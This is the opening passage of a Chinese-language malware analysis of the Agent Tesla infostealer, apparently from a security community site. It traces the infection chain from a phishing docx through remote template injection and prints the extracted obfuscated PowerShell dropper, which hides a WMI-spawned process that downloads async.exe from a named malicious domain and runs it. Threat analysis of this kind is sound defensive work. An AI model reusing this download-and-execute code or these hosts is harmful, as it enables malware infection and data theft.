Agent Tesla竊密軟件分析 - 網安 - 專業的網絡安全產業、社區、知識平臺

背景描述:

Agent Tesla為一款知名的商業竊密木馬,自從2014年Agent Tesla被發現以來一直非常活躍,多個變種層出不窮,主要由.Net 編寫,用于從失陷主機上竊取敏感信息,如剪貼板數據,鍵盤按鍵記錄,能夠從Web瀏覽器,電子郵件客戶端和FTP服務器訪問信息,屏幕截圖等。

分析認為Agent Tesla間諜軟件起源于土耳其,該惡意軟件通過Vidar或IcedID等垃圾郵件活動廣泛傳播。它通常以惡意文檔或通過惡意Web鏈接傳遞給受害者。訪問此類鏈接后,受污染的文檔將自動下載到受害者的PC上。

樣本概述:

此次分析的樣本初始載荷為一個docx文件,運行之后會通過遠程模板注入執行目標rtf文件,其中嵌入了多個ole對象去利用vba指令執行powershell去遠端下載名為async.exe的惡意軟件,然后從資源文件中讀取和加載后續惡意dll,攻擊者采用隱寫技術,將木馬執行程序隱藏在圖片資源中,dll主要功能為從圖片資源中讀取并且解密得到一段shellcode將其注入到AppLaunch.exe去執行,這段shellcode也就是最終的Agent Tesla核心功能。

執行流程:

樣本分析:

初始載荷:

釣魚文件名為波蘭語項目分析的docx文件,打開后會連接遠程服務器獲取模板并注入,通過這樣的方式可以規避對初始文件的檢測

從word\_rels文件夾的settings.xml.rels文件中找到了該word攜帶的惡意鏈接地址,從地址下載帶后續rtf文檔并且自動執行http://office-cloud-reserve.com/Projekt.rtf?raw=true

遠程模板rtf:

打開Projekt.rtf文檔,彈出宏安全檢測,發現是嵌入了多個ole對象,而OLE對象的OOXML中包含混淆的powershell代碼,使用oletools提取出來

cmd /c start /min powershell $Computer = '.';
$c = [WMICLASS]"""\$computerrootcimv2:WIn32_Process""";
$f =[WMICLASS]"""\$computerrootcimv2:Win32_ProcessStartup""";
$ty =$f.CreateInstance();
$ty.ShowWindow = 0;
$proc = $c.Create("""Powershell '(&(GCM *W-O*)Net.WebClient).DownloadFile(''http://office-cloud-reserve.com/async.exe'',''$env:APPDATA''async.exe'')'|IEX;
start-process('$env:APPDATA' + 'async.exe')""",$null,$ty)

通過WMI使用 "Win32_Process "類的 "Create "方法來創建一個新的進程執行下載后續的可執行文件http://office-cloud-reserve.com/async.exe,$env:APPDATA從環境變量里找到路徑C:\Users\Admin\AppData\Roaming把文件保存在此